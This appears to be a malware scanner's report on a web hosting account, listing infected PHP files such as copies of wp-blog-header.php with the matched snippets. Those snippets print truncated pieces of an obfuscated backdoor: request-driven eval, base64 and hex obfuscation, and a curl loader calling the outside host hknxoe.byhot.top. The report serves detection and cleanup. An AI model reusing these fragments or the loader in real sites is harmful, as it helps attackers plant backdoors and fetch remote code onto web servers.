| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/ssl/private/index.php Size: 15.44 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Warns: 2 Dangers: 11
| Description | Match |
|---|
Exploit base64_long Line: 8 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 7 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/private/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/ssl/text.php Size: 1.49 kB Created: 2023-04-24 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/analog/fb.turtlesys.net/admin.php Size: 1.49 kB Created: 2023-05-05 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/analog/saynotozynga.turtlesys.net/themes.php Size: 1.49 kB Created: 2023-02-06 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/analog/sequoia.shawndees.com/dropdown.php Size: 1.49 kB Created: 2023-02-03 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/analog/infinity.shawndees.com/dropdown.php Size: 1.49 kB Created: 2023-01-30 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/analog/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/awstats/ssl/index.php Size: 1.49 kB Created: 2023-10-10 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/awstats/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/cpbandwidth/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/logaholic/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/webalizer/adayinthelife.turtlesys.net/input.php Size: 1.49 kB Created: 2023-02-28 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/webalizer/zoom.turtlesys.net/about.php Size: 1.49 kB Created: 2023-11-13 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
